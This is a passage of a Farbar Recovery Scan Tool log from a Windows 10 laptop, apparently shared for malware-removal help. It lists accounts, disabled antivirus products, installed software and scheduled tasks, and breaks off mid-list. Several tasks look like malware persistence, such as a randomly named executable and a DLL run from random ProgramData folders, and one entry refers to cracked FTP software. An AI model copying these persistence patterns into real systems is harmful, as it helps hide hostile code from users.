2016-01-03 21:17 - 2016-05-31 19:22 - 0000600 _____ () C:\Users\007\AppData\Local\PUTTY.RND
2016-09-23 22:04 - 2016-09-23 22:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\007\AppData\Local\Temp\dllnt_dump.dll
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2017-02-21 22:59

==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:04-10-2015
Ran by 007 (2017-03-03 21:56:18)
Running from C:\Users\007\Desktop
Windows 10 Home (X64) (2016-09-24 04:17:52)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

007 (S-1-5-21-3283718265-1983809055-1317204610-1001 - Administrator - Enabled) => C:\Users\007
Administrator (S-1-5-21-3283718265-1983809055-1317204610-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3283718265-1983809055-1317204610-503 - Limited - Disabled)
Guest (S-1-5-21-3283718265-1983809055-1317204610-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Absolute Reminder (HKLM-x32\...\{40F4FF7A-B214-4453-B973-080B09CED019}) (Version: 2.3.0.1 - Absolute Software)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated)
AirDroid 3.2.2.0 (HKLM-x32\...\AirDroid) (Version: 3.2.2.0 - Sand Studio)
Apple Application Support (32-bit) (HKLM-x32\...\{F2871C89-C8A5-42EE-8D45-0F02506385A6}) (Version: 5.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{9BC93467-75D1-4AA4-BD58-D9C51D88DFAB}) (Version: 5.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
BlackChipPoker (HKLM-x32\...\FE4D6F94-B3D5-484b-94F7-8BC45DEB7A82) (Version: 16.6 - IGSoft)
BlueStacks App Player (HKLM-x32\...\{4047E0FE-CBD8-4915-BBB1-45F6CBF417AC}) (Version: 2.0.4.5627 - BlueStack Systems, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.26 - Piriform)
Classic Shell (HKLM\...\{D4B3454F-7529-4F5F-851D-2C36933F7D64}) (Version: 4.2.5 - IvoSoft)
CuteFTP 8 Professional (HKLM-x32\...\{91F34319-08DE-457a-99C0-0BCDFAC145B9}) (Version: 8.3.4 - GlobalSCAPE)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.0.2810 - CyberLink Corp.)
CyberLink PowerDirector 10 (Version: 10.0.0.2810 - CyberLink Corp.) Hidden
Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.3.2.2 - Dolby Laboratories Inc)
Dragon Assistant Application en-US version 1.5.8 (HKLM-x32\...\{1CCBE73F-4948-4711-8D12-22E2FD65D706}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Core Recognition Service version 1.1.10 (HKLM-x32\...\{E97BA7A6-46FC-4EBF-B24A-B8362948C696}_is1) (Version: 1.1.10 - Nuance Communications, Inc.)
Dragon Assistant Installer version 1.5.8 (HKLM-x32\...\{D57A8269-3BE5-4D10-B882-64D0F2D448BF}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Language Data en-US version 1.1.3 (HKLM-x32\...\{4C0C1E4E-D3B1-4496-98EC-DA14D45EC855}_is1) (Version: 1.1.3 - Nuance Communications, Inc.)
DVD Decrypter (Remove Only) (HKLM-x32\...\DVD Decrypter) (Version: - )
DVD Shrink 3.2 (HKLM-x32\...\DVD Shrink_is1) (Version: - DVD Shrink)
Easy2Convert PIC to JPG 2.2.1 (HKLM-x32\...\{958D3CE0-3C49-40F1-B2EF-14D8FAED7303}_is1) (Version: 2.2.1 - Easy2Convert Software)
Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.1.38 - Lenovo)
Energy Manager (x32 Version: 1.0.1.38 - Lenovo) Hidden
FileZilla Client 3.14.1 (HKLM-x32\...\FileZilla Client) (Version: 3.14.1 - Tim Kosse)
Foxit PhantomPDF Business (HKLM-x32\...\{05594894-9B62-4D66-BC12-4DA14CA22F28}) (Version: 7.3.6.321 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.8.1124 - Foxit Software Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
Intel Experience Center - Configuration (x32 Version: 1.7.0.179 - Intel) Hidden
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.1.0.2103 - Intel Corporation)
Intel(R) Experience Center Desktop Software (HKLM-x32\...\{3608ec0a-56b4-4d9d-b038-9b3e51d72582}) (Version: 1.7.0.179 - Intel)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1337.1) (HKLM\...\{302600C1-6BDF-4FD1-1307-148929CC1385}) (Version: 3.1.1307.0362 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{D6FBF816-ACB8-46CC-ACC6-C8BBA85F497D}) (Version: 4.2.40.2418 - Intel Corporation)
Intel(R) Update Manager (x32 Version: 1.6.2.69 - Intel Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{e1172fd4-a6d9-4cfa-8256-268f728fec31}) (Version: 16.5.3 - Intel Corporation)
iTunes (HKLM\...\{554C62C7-E6BB-40F1-892B-F0AE02D3C135}) (Version: 12.5.3.17 - Apple Inc.)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java SE Development Kit 8 Update 101 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180101}) (Version: 8.0.1010.13 - Oracle Corporation)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass)
Lenovo App Shop (HKLM-x32\...\Lenovo App Shop 45246) (Version: 3.10.0.45246.24 - Lenovo)
Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10240 - Realtek Semiconductor Corp.)
Lenovo Motion Control (HKLM-x32\...\InstallShield_{A800D2BF-2F0D-4899-B265-C91C90981E8C}) (Version: 2.0.0.0829 - PointGrab)
Lenovo Motion Control (x32 Version: 2.0.0.0829 - PointGrab) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.)
Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden
Lenovo Smart Voice (HKLM\...\Lenovo SmartVoice) (Version: 1.0.2.0 - Lenovo)
Lenovo Transition (HKLM\...\Lenovo Transition) (Version: 2.0.13.8211 - Lenovo)
Lenovo Yoga PhoneCompanion (HKLM-x32\...\InstallShield_{0F82EA83-B0C5-4AB9-9695-DFE92C5FD57B}) (Version: 1.1.9.3 - Lenovo)
Lenovo Yoga PhoneCompanion (x32 Version: 1.1.9.3 - Lenovo) Hidden
Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version: - )
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.12 - Magical Jelly Bean)
Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4903.1002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.5.4 - Motorola Mobility)
Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden
Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Nitro Pro 8 (HKLM\...\{2269F0D5-DE47-4313-9003-BB6357919314}) (Version: 8.5.5.7 - Nitro)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
QuickTime Alternative 1.81 (HKLM-x32\...\QuicktimeAlt_is1) (Version: 1.81 - )
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.)
ReminderInstaller (HKLM-x32\...\InstallShield_{48B99BC9-CEB0-485E-96B1-4609BC86D2DE}) (Version: 1.00.0000 - Absolute Software.)
ReminderInstaller (x32 Version: 1.00.0000 - Absolute Software.) Hidden
Revo Uninstaller Pro 3.1.4 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.4 - VS Revo Group, Ltd.)
RogueKiller version 12.9.9.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.9.9.0 - Adlice Software)
SofTest v11 (HKLM-x32\...\InstallShield_{BEFAE631-635D-41B7-996E-33F134DE951D}) (Version: 11.31.1 - Examsoft)
SofTest v11 (x32 Version: 11.31.1 - Examsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.5 - Synaptics Incorporated)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.15 - Lenovo)
UserGuide (x32 Version: 1.0.0.15 - Lenovo) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VPN Unlimited version 3.1.5 (HKLM-x32\...\{DC24521E-872B-41AF-93EA-FE477902D6FB}_is1) (Version: 3.1.5 - KeepSolid Inc.)
VUDU To Go (HKLM-x32\...\com.vudu.air.Downloader) (Version: 2.3.1 - Vudu)
VUDU To Go (x32 Version: 2.3.1 - Vudu) Hidden
Windows Driver Package - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo)
Windows Driver Package - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
WinRAR 5.30 beta 5 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.5 - win.rar GmbH)
XnConvert 1.73 (HKLM-x32\...\XnConvert_is1) (Version: 1.73 - Gougelet Pierre-e)
Yoga Picks (HKLM-x32\...\{267C8BA0-876B-4589-9F14-EFB84ABCEA7F}) (Version: 1.00.013.0731 - Lenovo)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6798.0207\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)

==================== Restore Points =========================

03-03-2017 21:10:31 JRT Pre-Junkware Removal

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2013-08-22 07:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03896D04-23AB-4F74-A27D-B1B71EE41E2C} - System32\Tasks\Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask => C:\Windows\system32\MDMAgent.exe [2016-07-16] (Microsoft Corporation)
Task: {03FC901B-03A8-46EB-801A-6B41B55D19B8} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {0532AB2A-3568-4A59-9C82-2B644C49851D} - System32\Tasks\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate
Task: {09D247E6-38E4-4228-BB1B-6BE1E48FC850} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {0D2FDC56-13CB-486A-BA0A-4C648309A083} - \{087F0D47-047E-057E-7911-7879097A110A} -> No File <==== ATTENTION
Task: {11EF8237-224D-4CF9-9039-61D08754EA5D} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {132934A7-AF74-4FBF-8B3E-69282D4B6053} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-06-03] (Synaptics Incorporated)
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task
Task: {184784E2-6ACB-4154-BD0F-A955BE13F177} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange
Task: {1AD363AC-A1A5-4239-86F6-60C9AC4B4F31} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task
Task: {20F8AF67-5750-4720-B0AC-8D14ACF2A51E} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTaskLogon => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {287685D1-1882-4B11-8A3F-7DA00FFC31C2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\Windows\System32\AutoWorkplace.exe
Task: {35C15BFF-0053-4E3F-9D8F-12A1B3315818} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {365DF4D4-9F2A-4BB6-B466-7B245416627A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {36DF9173-D619-4613-85F9-64D7768DA80D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {3726FFF1-82E3-4BF4-82F6-F49CF9A31CCE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)
Task: {43DF67E8-D733-48FA-98F2-4E6D341E4A79} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {44707F62-A094-44E9-AF19-40CD1E6A8FA5} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {51B7FB15-4DCB-400E-9A98-10E802F21FB3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceScreenOnOff
Task: {5654DFBB-E797-4758-B9A0-8BAE94A91F1D} - System32\Tasks\Microsoft\Windows\DUSM\dusmtask => C:\Windows\System32\dusmtask.exe [2016-07-16] (Microsoft Corporation)
Task: {5B1BFB8A-7401-4997-9C41-F6CE9BD3A096} - System32\Tasks\Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate
Task: {5FAAF530-ED1B-4F7B-AD7B-1694AA0B202B} - System32\Tasks\Microsoft\Windows\CertificateServicesClient\CryptoPolicyTask
Task: {6232090F-3BD0-4E1F-960B-78CBA797F685} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleWnsCommand
Task: {668FBCA0-F2D3-48CC-8B65-72CF17BC93FE} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2017-02-23] (Microsoft Corporation)
Task: {675C1F35-C487-4F46-8C84-0A5E9589D3C2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {67DB9C2C-778D-4C59-9507-E882F7A00413} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Logon => C:\Windows\system32\ProvTool.exe [2016-09-24] (Microsoft Corporation)
Task: {6B1AE720-1359-4B9E-9C0F-60167361EF01} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask
Task: {6D1C0035-5CAD-4340-A533-D63C9853BCC9} - System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Management Initialization
Task: {6E8AE752-C5D2-4B34-B351-338B4370A342} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleCommand
Task: {6EB74394-17E6-4CD1-922E-7ABCAA8840E5} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {769A9BD4-DD4F-4EC7-AB96-408AF78E5A35} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {7AC5E1E2-2FD3-40CD-8842-88CE53A3609C} - System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense
Task: {7D64B009-CEAB-4E68-B328-7CD0AC72B421} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {80416385-3D28-4A19-941E-3A6AF6251733} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: {82EBF27F-B848-4FC6-A93C-0E2F5DEF2F73} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {84074B47-185C-4F11-9725-63EEC24862DA} - System32\Tasks\Microsoft\Windows\License Manager\TempSignedLicenseExchange
Task: {8519140C-2AEF-4987-B1B6-075F6AAB760A} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {85F00F57-CCEF-43D1-AA53-8FB9FFCD43BF} - System32\Tasks\{26246267-DEF5-4009-831D-1F5587DB66B2} => pcalua.exe -a "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE\cuteftppro.exe" -d "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE"
Task: {8689A384-D0C3-4535-8A48-350B3EB44FC9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)
Task: {8794EAED-EC72-4A28-B331-B9F73019EBBE} - System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe <==== ATTENTION
Task: {8992DB38-9182-4B89-A615-A01B3F8C9F8F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {8D791FAA-0257-4EBC-A6DD-74E842528806} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceSettingChange
Task: {9851188E-AC07-4F36-BA28-6D00BB2C9C46} - System32\Tasks\Microsoft\Windows\Device Information\Device => C:\Windows\system32\devicecensus.exe [2016-10-14] (Microsoft Corporation)
Task: {A1A1610B-2B55-4C5E-BC46-458BF76BA02A} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {A234E539-ED0C-4C05-87B9-6A5BFC81F815} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2016-07-16] (Microsoft Corporation)
Task: {A4497E84-87C6-4477-BDFD-E958CED4C0BE} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {A641F614-D34F-4C28-9705-E201521B7754} - System32\Tasks\OneDrive Standalone Update Task v2 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {A7F3919A-4125-4892-A812-236A5557F5E7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-21] (Piriform Ltd)
Task: {AA1E3E10-D4BA-4681-8F7C-779A395428D0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B0C5406D-7014-49AA-9498-179A0CBB1183} - System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A} => C:\PROGRA~3\ea2cb491\ddb08c37.dll/s /n /I:"/rt" "C:\PROGRA~3\ea2cb491\ddb08c37.dll"
Task: {B320E058-C6FA-413F-876B-0C9B4428AE66} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic6
Task: {B6EE76B2-4F82-4E15-9345-C867A29CBAD0} - System32\Tasks\Microsoft\Windows\Speech\SpeechModelDownloadTask => C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe [2016-09-24] (Microsoft Corporation)
Task: {BDDEF317-2692-422F-AEA2-FFD67DC7CEA3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterUserDevice
Task: {C125018F-0B81-4B64-B7DC-0E01220E5D0E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceAccountChange
Task: {C34D8C79-A216-4091-9D42-EC02CF67B018} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C55F594B-885F-4350-A465-7D88160B3801} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {C6B2579B-4962-4D12-883D-BBD420573A6C} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic1
Task: {CAFE5B51-DC10-4097-8DB7-704EE8566FA5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CC1FFF22-A79B-469F-9BBD-E135EF0BE706} - \Adobe Flash Player PPAPI Notifier -> No File <==== ATTENTION
Task: {CC636E49-0109-402B-A40B-A37C29069A95} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\LocateCommandUserSession
Task: {D19A2726-897E-4F7D-9CE4-0773B449CE9E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceConnectedToNetwork
